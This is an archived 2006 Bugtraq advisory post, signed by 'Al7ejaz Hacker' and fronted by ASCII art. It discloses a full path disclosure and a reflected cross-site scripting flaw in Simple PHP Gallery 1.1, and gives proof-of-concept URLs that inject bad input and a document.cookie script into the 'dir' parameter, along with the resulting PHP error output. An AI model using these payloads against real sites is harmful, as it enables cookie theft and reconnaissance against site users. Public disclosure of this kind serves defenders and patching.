Bugtraq mailing list archives
Cross site scripting & fullpath disclosure
From: saudi () hotmail fr
Date: 24 Nov 2006 01:42:31 -0000
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ ;;ii,,::
+
+ :::: :: ;;tt;;::
+
+ ;;:: ..,,:: ;;ii,,::
+
+ ,,,, ii;;,, ii;;:: ;;ii,,::
+
+ ii:: tt;;,, ..tt;;,,.. ;;ii;;::
+
+ ii,,:: ttii,, ..ff;;;;:: ;;ii;;::
+
+ tt;;::..,, tt;;,, ff;;;;ii ;;ii,,::
+
+ tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,::
+
+ tt;;;;,, tt;;,,.. tt;;;; ;;ii;;::
+
+ ..::,,;;,, tt;;,,.. tt;;,, ;;ii,,::
+
+ ..::,,ii;;;;.. tt;;,,.. iiii,,:: ;;ii,,::
+
+ ::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,::
+
+ ,,;;ii tt;;,, ii;;,,.. ..jj;;:: ;;ii;;::
+
+ ;;;;:: tt;;:: tt;;;;.. ff;;:: ;;tt,,..
+
+ ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,..
+
+ ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;..
+
+ tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,..
+
+ jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,..
+
+ ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;..
+
+ ..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,..
+
+ iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;;
+
+ ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;:: ;;ii,,
+
+ jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,,
+
+ jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii::
+
+ iijjjjjjtt;; ;;ffffjjjjtt:: ;;ii
+
+ ;;.. ii;;
+
+ ..
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Credit by : Al7ejaz Hacker
+
+
+
+Script : Simple PHP Gallery 1.1
+
+Impact : Cross site scripting & fullpath disclosure
+
+
+
+
+
+Fullpath disclosure :
+
+
+
+http://localhost/sp_index.php?dir=[Somthingwrong]
+
+
+
+Result
+
+
+
+
+
+Warning: opendir(123): failed to open dir: No such file or directory in /var/www/html/gallery/sp_helper_functions.php
on line 10 +
+
+
+Warning: readdir(): supplied argument is not a valid Directory resource in
/var/www/html/gallery/sp_helper_functions.php on line 11 +
+
+
+Warning: Invalid argument supplied for foreach() in /var/www/html/gallery/sp_def_vars.php on line 147
+
+
+
+
+
+
+
+
+
+Cross Site Scripting
+
+
+
+
+
+
+
+dir variable is not probrely verified and can be used to execute html and javascript code
+
+
+
+http://localhost/sp_index.php?dir=<script>alert(document.cookie)</script>
+
+
+
+/Milw0rm
+
+
+
+
+
+in subject hot : Cross site scripting & fullpath disclosure ;)
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Current thread:
- Cross site scripting & fullpath disclosure saudi (Nov 24)